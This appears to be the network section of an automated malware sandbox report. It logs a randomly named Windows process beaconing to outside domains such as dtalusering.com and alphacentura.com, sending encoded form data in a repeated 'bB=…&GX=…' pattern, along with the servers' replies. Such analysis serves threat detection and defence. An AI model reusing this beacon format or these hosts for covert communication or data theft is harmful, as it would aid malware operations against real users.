                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:05:40.013902903 CEST | 553 | IN | HTTP/1.1 301 Moved Permanently
                                    Content-Type: application/binary
                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                    Pragma: no-cache
                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                    Date: Thu, 11 Jul 2024 13:05:39 GMT
                                    Location: https://www.u9games.xyz/5p8u/?bB=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE4pdkHQNYCcMydqGB2gqLe2sbuiq25D1rJ1mxG6bIX3u8VlvncNw%3D&GX=iP9xCL
                                    Server: ESF
                                    Content-Length: 0
                                    X-XSS-Protection: 0
                                    X-Frame-Options: SAMEORIGIN
                                    X-Content-Type-Options: nosniff
                                    Connection: close
                                    Jul 11, 2024 15:05:40.021761894 CEST | 553 | IN | HTTP/1.1 301 Moved Permanently
                                    Content-Type: application/binary
                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                    Pragma: no-cache
                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                    Date: Thu, 11 Jul 2024 13:05:39 GMT
                                    Location: https://www.u9games.xyz/5p8u/?bB=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE4pdkHQNYCcMydqGB2gqLe2sbuiq25D1rJ1mxG6bIX3u8VlvncNw%3D&GX=iP9xCL
                                    Server: ESF
                                    Content-Length: 0
                                    X-XSS-Protection: 0
                                    X-Frame-Options: SAMEORIGIN
                                    X-Content-Type-Options: nosniff
                                    Connection: close


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    1 | 192.168.2.6 | 49721 | 103.42.108.46 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:00.490458012 CEST | 859 | OUT | POST /la5g/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dtalusering.com
                                    Content-Length: 207
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dtalusering.com
                                    Referer: http://www.dtalusering.com/la5g/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 34 4e 6e 31 35 37 71 4b 6a 73 58 34 78 6b 39 2b 53 72 53 75 73 45 56 74 6f 42 54 31 6a 42 51 72 47 6a 38 45 51 59 53 66 56 67 33 61 67 79 76 6c 43 4f 70 63 69 31 77 78 45 72 74 56 61 77 55 6e 35 58 30 63 71 62 71 39 48 5a 78 77 2f 74 46 53 6f 59 74 49 73 43 67 64 4e 73 35 4f 66 49 2f 50 6c 2b 42 30 41 46 75 4e 79 33 72 5a 6e 64 6b 52 45 6b 42 48 32 55 51 49 59 78 78 74 38 53 2f 76 43 65 6a 6b 44 75 66 79 54 36 58 61 75 5a 69 41 73 67 70 75 57 70 50 31 6d 4b 68 36 41 30 6c 47 50 35 57 30 50 2f 2b 33 36 48 6b 79 54 4c 35 33 6b 52 39 6a 30 65 4e 2f 34 30 66 57 70 46 6f 7a 36 64 54 47 36 36 45 5a 37 35 76 56
                                    Data Ascii: bB=4Nn157qKjsX4xk9+SrSusEVtoBT1jBQrGj8EQYSfVg3agyvlCOpci1wxErtVawUn5X0cqbq9HZxw/tFSoYtIsCgdNs5OfI/Pl+B0AFuNy3rZndkREkBH2UQIYxxt8S/vCejkDufyT6XauZiAsgpuWpP1mKh6A0lGP5W0P/+36HkyTL53kR9j0eN/40fWpFoz6dTG66EZ75vV
                                    Jul 11, 2024 15:06:01.366575956 CEST | 170 | IN | HTTP/1.1 405 Method Not Allowed
                                    Content-Type: text/plain; charset=utf-8
                                    Date: Thu, 11 Jul 2024 13:06:01 GMT
                                    Content-Length: 18
                                    Connection: close
                                    Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64
                                    Data Ascii: Method Not Allowed


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    2 | 192.168.2.6 | 49722 | 103.42.108.46 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:03.503858089 CEST | 883 | OUT | POST /la5g/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dtalusering.com
                                    Content-Length: 231
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dtalusering.com
                                    Referer: http://www.dtalusering.com/la5g/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 34 4e 6e 31 35 37 71 4b 6a 73 58 34 77 46 74 2b 55 4d 6d 75 37 55 56 75 6d 68 54 31 34 52 51 76 47 6a 77 45 51 64 71 50 56 53 6a 61 67 54 66 6c 44 4c 64 63 6a 31 77 78 4d 4c 74 63 56 51 55 67 35 58 49 6c 71 61 57 39 48 59 52 77 2f 76 64 53 6f 76 78 58 74 53 67 66 46 4d 35 4d 52 6f 2f 50 6c 2b 42 30 41 46 37 59 79 33 6a 5a 6e 74 55 52 46 41 56 45 70 6b 51 4c 49 68 78 74 74 69 2f 72 43 65 6a 4e 44 72 48 49 54 34 2f 61 75 63 4f 41 39 52 70 74 63 70 50 76 37 36 67 61 49 6d 30 53 42 70 48 44 44 2b 53 4c 35 56 41 59 62 64 34 74 34 69 39 41 6d 4f 74 39 34 32 48 6b 70 6c 6f 5a 34 64 72 47 6f 74 49 2b 30 4e 4b 32 54 53 65 36 74 51 72 47 4b 4d 49 4f 65 6e 72 6e 48 65 2f 69 51 51 3d 3d
                                    Data Ascii: bB=4Nn157qKjsX4wFt+UMmu7UVumhT14RQvGjwEQdqPVSjagTflDLdcj1wxMLtcVQUg5XIlqaW9HYRw/vdSovxXtSgfFM5MRo/Pl+B0AF7Yy3jZntURFAVEpkQLIhxtti/rCejNDrHIT4/aucOA9RptcpPv76gaIm0SBpHDD+SL5VAYbd4t4i9AmOt942HkploZ4drGotI+0NK2TSe6tQrGKMIOenrnHe/iQQ==
                                    Jul 11, 2024 15:06:04.671303034 CEST | 170 | IN | HTTP/1.1 405 Method Not Allowed
                                    Content-Type: text/plain; charset=utf-8
                                    Date: Thu, 11 Jul 2024 13:06:04 GMT
                                    Content-Length: 18
                                    Connection: close
                                    Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64
                                    Data Ascii: Method Not Allowed
                                    Jul 11, 2024 15:06:04.676837921 CEST | 170 | IN | HTTP/1.1 405 Method Not Allowed
                                    Content-Type: text/plain; charset=utf-8
                                    Date: Thu, 11 Jul 2024 13:06:04 GMT
                                    Content-Length: 18
                                    Connection: close
                                    Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64
                                    Data Ascii: Method Not Allowed


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    3 | 192.168.2.6 | 49723 | 103.42.108.46 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:06.073836088 CEST | 1896 | OUT | POST /la5g/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dtalusering.com
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dtalusering.com
                                    Referer: http://www.dtalusering.com/la5g/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 34 4e 6e 31 35 37 71 4b 6a 73 58 34 77 46 74 2b 55 4d 6d 75 37 55 56 75 6d 68 54 31 34 52 51 76 47 6a 77 45 51 64 71 50 56 53 62 61 68 68 58 6c 42 6f 46 63 6c 46 77 78 47 72 74 52 56 51 55 78 35 58 51 68 71 61 62 4b 48 64 56 77 39 4d 56 53 75 64 5a 58 6a 53 67 66 4a 73 35 4e 66 49 2f 57 6c 2b 52 77 41 46 72 59 79 33 6a 5a 6e 76 4d 52 41 6b 42 45 36 30 51 49 59 78 78 68 38 53 2b 30 43 66 4c 33 44 72 79 31 55 49 66 61 75 38 65 41 75 44 78 74 47 70 50 78 36 36 67 34 49 6d 34 6b 42 70 61 34 44 2b 57 68 35 57 63 59 4b 34 6c 4e 70 7a 56 4c 30 64 67 46 73 32 33 30 6b 46 6c 72 68 50 7a 32 35 50 49 2b 37 70 43 69 4c 31 57 4c 34 68 65 78 4b 2f 77 2b 43 6e 43 62 4d 74 6d 50 48 45 39 46 6c 6a 35 6e 67 73 54 4b 54 4a 2b 54 6b 6d 6c 39 65 65 76 62 31 70 34 54 79 78 47 46 63 6b 73 37 4f 32 48 59 4f 31 34 4b 7a 64 52 43 36 77 6e 41 33 72 57 35 30 54 47 65 47 53 7a 42 30 58 75 62 65 43 4c 51 64 39 30 65 57 6c 64 5a 37 56 77 63 6f 38 51 68 34 70 79 59 73 58 4b 51 69 34 72 5a 2f 77 76 31 30 74 61 4d 6d 75 4a [TRUNCATED]
                                    Data Ascii: bB= [TRUNCATED]
                                    Jul 11, 2024 15:06:06.933346033 CEST | 170 | IN | HTTP/1.1 405 Method Not Allowed
                                    Content-Type: text/plain; charset=utf-8
                                    Date: Thu, 11 Jul 2024 13:06:06 GMT
                                    Content-Length: 18
                                    Connection: close
                                    Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64
                                    Data Ascii: Method Not Allowed


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    4 | 192.168.2.6 | 49725 | 103.42.108.46 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:09.188757896 CEST | 586 | OUT | GET /la5g/?bB=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgux8tOuN0aZLZltNFIk/K42/BpKJFGlwhqT0DSxlttxHpFsGsCOs=&GX=iP9xCL HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.dtalusering.com
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:06:10.074584007 CEST | 1236 | IN | HTTP/1.1 200 OK
                                    Cache-Control: no-cache, private
                                    Content-Type: text/html; charset=UTF-8
                                    Date: Thu, 11 Jul 2024 13:06:09 GMT
                                    Connection: close
                                    Transfer-Encoding: chunked
                                    Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 41 55 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 65 6e 74 72 61 69 70 2e 63 6f 6d 2e 61 75 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 73 79 6e 65 72 67 79 77 68 6f 6c 65 73 61 6c 65 2e 63 6f 6d 2f 6d 61 6e 61 67 65 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 35 36 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 44 72 6f 69 64 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e [TRUNCATED]
                                    Data Ascii: 8000<!DOCTYPE html> <html lang=en-AU><head><link rel="icon" type="image/x-icon" href="https://ventraip.com.au/favicon.ico"><link rel="stylesheet" href="//static.synergywholesale.com/manage/style.css?v=563" type="text/css"><link href="//fonts.googleapis.com/css?family=Droid+Sans:400,700" rel="stylesheet" type="text/css"><script type="text/javascript" src="/inc/js/components/jquery-3.5.1.min.js"></script><script type="text/javascript" src="/inc/js/components/client.js"></script><link rel="stylesheet" href="/inc/js/components/Aristo.css" type="text/css" /><script type="text/javascript" src="/inc/js/components/jquery-ui.min.js?v=2"></script><link rel="stylesheet" href="/inc/js/components/fancybox.min.css" type="text/css" /><link rel="stylesheet" href="/inc/style/scss/timepicker.css"><link rel="stylesheet" href="/inc/js/components/chosen.css"><script type="text/javascript" src="/inc/js/components/polyfill.min.js"></script><script type="text/jav [TRUNCATED]
                                    Jul 11, 2024 15:06:10.074639082 CEST | 1236 | IN | Data Raw: 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 69 6e 63 2f 6a 73 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 66 61 6e 63 79 62 6f 78 2e 6d
                                    Data Ascii: js"></script><script type="text/javascript" src="/inc/js/components/fancybox.min.js"></script><script type="text/javascript" src="/inc/js/components/sweetalert2.min.js"></script><script type="text/javascript" src="/inc/js/component
                                    Jul 11, 2024 15:06:10.074675083 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                    Data Ascii: width: 100%; display: flex; justify-content: center; max-width: 95vw; } td input, td select { width: 100%;
                                    Jul 11, 2024 15:06:10.074708939 CEST | 1236 | IN | Data Raw: 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f
                                    Data Ascii: rtant; line-height: normal; margin: auto; } } p { opacity: 1 !important; } #cor > div {
                                    Jul 11, 2024 15:06:10.074744940 CEST | 896 | IN | Data Raw: 20 23 66 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 34 70 78 20 33 32 70 78 20 2d 34 70 78 20 72 67 62 61 28 32 35 2c 32 38 2c 31 30 34 2c 2e 31 38 29
                                    Data Ascii: #fff !important; box-shadow: 0 4px 32px -4px rgba(25,28,104,.18); overflow: hidden; border-radius: 12px; margin: 16px auto; } .template-center a {
                                    Jul 11, 2024 15:06:10.074779987 CEST | 1236 | IN | Data Raw: 69 64 65 6e 74 69 74 79 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 20 3e 20 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 30 70 78 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70
                                    Data Ascii: identity-verification > p { margin: 20px auto; padding: 0 20px; max-width: 575px; } #identity-verification > p:last-of-type { font-weight: bolder;
                                    Jul 11, 2024 15:06:10.074816942 CEST | 1236 | IN | Data Raw: 3a 20 31 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 76 65 72 69 66 79 2d 66 6f 72 6d 20 2e 64 6f 63 75 6d 65 6e 74 2d 74 79 70 65 73 5f 5f 73 65 6c 65 63 74 20 3e 20 6c 61 62 65 6c 20
                                    Data Ascii: : 100px; } #verify-form .document-types__select > label > p { width: clamp(100%, 300px, 30vw); } #verify-form .identity-document-form { width: clamp(300px, 7
                                    Jul 11, 2024 15:06:10.074851990 CEST | 1236 | IN | Data Raw: 6e 20 63 6f 6e 74 65 6e 74 3d 76 66 42 6f 4a 78 63 74 64 38 47 42 57 62 52 6f 74 59 45 73 55 38 53 6b 6e 6c 69 76 51 55 63 43 4d 4c 54 79 72 69 4b 33 34 44 4d 3e 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 50 61 72 6b 65 64 20 57 69 74 68 20 56 65
                                    Data Ascii: n content=vfBoJxctd8GBWbRotYEsU8SknlivQUcCMLTyriK34DM><title>Domain Parked With VentraIP Australia</title><meta name=next-head-count content=7><style>body,html{padding:0;margin:0;scroll-behavior:smooth!important;color:#09091f}@media only scree
                                    Jul 11, 2024 15:06:10.074886084 CEST | 1236 | IN | Data Raw: 68 33 2e 74 68 69 6e 2c 2e 68 34 2e 74 68 69 6e 2c 2e 68 35 2e 74 68 69 6e 2c 2e 68 36 2e 74 68 69 6e 2c 68 31 2e 74 68 69 6e 2c 68 32 2e 74 68 69 6e 2c 68 33 2e 74 68 69 6e 2c 68 34 2e 74 68 69 6e 2c 68 35 2e 74 68 69 6e 2c 68 36 2e 74 68 69 6e
                                    Data Ascii: h3.thin,.h4.thin,.h5.thin,.h6.thin,h1.thin,h2.thin,h3.thin,h4.thin,h5.thin,h6.thin{font-weight:500}}p{font-size:16px;line-height:24px}@media only screen and (max-width:1200px){p{font-size:14px;line-height:20px}}.body1{font-size:16px;line-heigh
                                    Jul 11, 2024 15:06:10.074928045 CEST | 1236 | IN | Data Raw: 64 69 75 73 3a 36 70 78 7d 2e 62 67 64 2d 30 32 3a 62 65 66 6f 72 65 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 32 73 20 65 61 73 65 2c 62 61 63 6b 67 72 6f 75 6e 64 20 2e 32 73 20 65 61 73 65 7d 2e 62 67 64 2d 30 32 3a 68 6f
                                    Data Ascii: dius:6px}.bgd-02:before{transition:opacity .2s ease,background .2s ease}.bgd-02:hover:before{opacity:1}.txt-FFFFFF{color:#fff}.bgd-02.disabled:before,.bgd-02:disabled:before{opacity:1}.bs-2:after{position:absolute;top:0;left:0;width:calc(100%
                                    Jul 11, 2024 15:06:10.082590103 CEST | 1236 | IN | Data Raw: 6d 29 22 3b 2d 6d 6f 7a 2d 6f 70 61 63 69 74 79 3a 31 3b 2d 6b 68 74 6d 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 69 6e 38 35 7b 30 25 7b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22
                                    Data Ascii: m)";-moz-opacity:1;-khtml-opacity:1;opacity:1}}@keyframes fadein85{0%{-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=$param)";filter:"alpha(opacity=$param)";-moz-opacity:1;-khtml-opacity:1;opacity:1}to{-ms-filter:"progid:DXImageTr


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    5 | 192.168.2.6 | 49727 | 188.114.97.3 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:16.735801935 CEST | 850 | OUT | POST /mnr7/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.alphacentura.com
                                    Content-Length: 207
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.alphacentura.com
                                    Referer: http://www.alphacentura.com/mnr7/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 6b 74 37 65 45 31 73 58 61 37 49 57 61 49 6f 68 34 72 58 72 31 64 61 74 2b 78 72 70 51 32 62 41 45 36 72 6c 6b 71 63 57 79 34 43 41 6d 4d 6a 4b 72 54 47 4e 71 55 58 6a 41 61 54 76 50 74 72 64 47 38 38 44 63 45 37 42 41 34 63 35 36 6f 30 77 34 45 33 39 72 4d 43 4e 58 2f 68 38 56 72 31 70 38 67 5a 49 4d 50 2b 43 52 32 65 4e 4f 53 43 41 59 4a 62 5a 50 6e 4a 47 62 73 76 4a 42 5a 71 4e 39 77 43 43 30 66 63 46 70 58 6f 75 30 46 32 33 52 79 53 68 73 4a 2b 35 43 47 6d 37 4e 33 2b 69 6d 75 61 62 7a 42 2f 56 71 4c 45 4b 50 36 46 75 68 37 74 6b 4f 37 64 71 73 69 2f 4b 7a 73 67 35 68 6a 37 64 57 4e 41 69 37 48 37 62
                                    Data Ascii: bB=kt7eE1sXa7IWaIoh4rXr1dat+xrpQ2bAE6rlkqcWy4CAmMjKrTGNqUXjAaTvPtrdG88DcE7BA4c56o0w4E39rMCNX/h8Vr1p8gZIMP+CR2eNOSCAYJbZPnJGbsvJBZqN9wCC0fcFpXou0F23RyShsJ+5CGm7N3+imuabzB/VqLEKP6Fuh7tkO7dqsi/Kzsg5hj7dWNAi7H7b
                                    Jul 11, 2024 15:06:17.938327074 CEST | 803 | IN | HTTP/1.1 200 OK
                                    Date: Thu, 11 Jul 2024 13:06:17 GMT
                                    Content-Type: text/html;charset=utf8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hy4wnMypSvedVQgxRvQcR5TrY8fFoJ5Wcboo1hEYfqBmN9flN6GnKChbpVi%2F8EfzPhq0vX2Gmk0yiXcdmA6yEcGfmbYOZETu8cAUWjXtNv%2B7cnvxinftn0T4xoOkIn%2Fq4JF1SXzCzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8a190288ff61c43b-EWR
                                    Content-Encoding: gzip
                                    alt-svc: h3=":443"; ma=86400
                                    Data Raw: 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 b3 c9 4d 2d 49 54 48 ce 48 2c 2a 4e 2d b1 55 2a 2d 49 d3 b5 50 52 d0 b7 b3 29 c9 2c c9 49 b5 7b b6 b8 e1 d9 d6 ee 27 3b d6 da e8 43 04 6c 52 32 cb ec 5e 6c df fc 62 ef 1a b0 28 88 6b a3 0f 36 8a cb a6 38 b9 28 b3 a0 c4 4e a1 3c 33 2f 25 bf 5c 2f 27 3f 39 b1 24 33 3f 4f 2f a3 28 35 4d c1 56 49 3f 37 af c8 5c df 3e a9 a4 3c 31 cd d6 d4 cc dc c4 c0 c2 c4 52 c9 5a c1 46 1f aa 11 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 47 4d c8 13 94 00 00 00 0d 0a 30 0d 0a 0d 0a
                                    Data Ascii: 93(M-ITHH,*N-U*-IPR),I{';ClR2^lb(k68(N<3/%\/'?9$3?O/(5MVI?7\><1RZFbGM0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    6 | 192.168.2.6 | 49728 | 188.114.97.3 | 80 | 6784 | C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:06:19.325665951 CEST | 874 | OUT | POST /mnr7/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.alphacentura.com
                                    Content-Length: 231
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.alphacentura.com
                                    Referer: http://www.alphacentura.com/mnr7/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 6b 74 37 65 45 31 73 58 61 37 49 57 59 6f 59 68 30 71 58 72 77 39 61 75 78 52 72 70 48 6d 62 4d 45 36 6e 6c 6b 76 39 4c 79 72 71 41 6d 73 54 4b 71 58 79 4e 70 55 58 6a 59 71 54 75 4c 74 72 47 47 38 35 2b 63 42 62 42 41 35 34 35 36 70 6f 77 34 32 66 36 74 63 43 4c 43 50 68 2b 52 72 31 70 38 67 5a 49 4d 50 72 4b 52 32 47 4e 4f 69 79 41 4a 59 62 61 47 48 4a 46 52 4d 76 4a 58 70 71 4a 39 77 43 77 30 65 41 72 70 53 73 75 30 45 71 33 52 6a 53 69 6d 4a 2f 38 4e 6d 6e 37 4e 79 62 4f 71 65 66 33 79 41 66 66 34 35 55 56 4f 4d 45 30 39 49 74 48 63 72 39 6f 73 67 6e 34 7a 4d 67 54 6a 6a 44 64 45 61 4d 46 30 7a 65 34 65 77 79 47 41 61 47 78 7a 64 33 54 43 56 6e 75 30 4a 63 2b 77 41 3d 3d
                                    Data Ascii: bB=kt7eE1sXa7IWYoYh0qXrw9auxRrpHmbME6nlkv9LyrqAmsTKqXyNpUXjYqTuLtrGG85+cBbBA5456pow42f6tcCLCPh+Rr1p8gZIMPrKR2GNOiyAJYbaGHJFRMvJXpqJ9wCw0eArpSsu0Eq3RjSimJ/8Nmn7NybOqef3yAff45UVOME09ItHcr9osgn4zMgTjjDdEaMF0ze4ewyGAaGxzd3TCVnu0Jc+wA==
                                    Jul 11, 2024 15:06:19.932529926 CEST | 793 | IN | HTTP/1.1 200 OK
                                    Date: Thu, 11 Jul 2024 13:06:19 GMT
                                    Content-Type: text/html;charset=utf8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    CF-Cache-Status: DYNAMIC
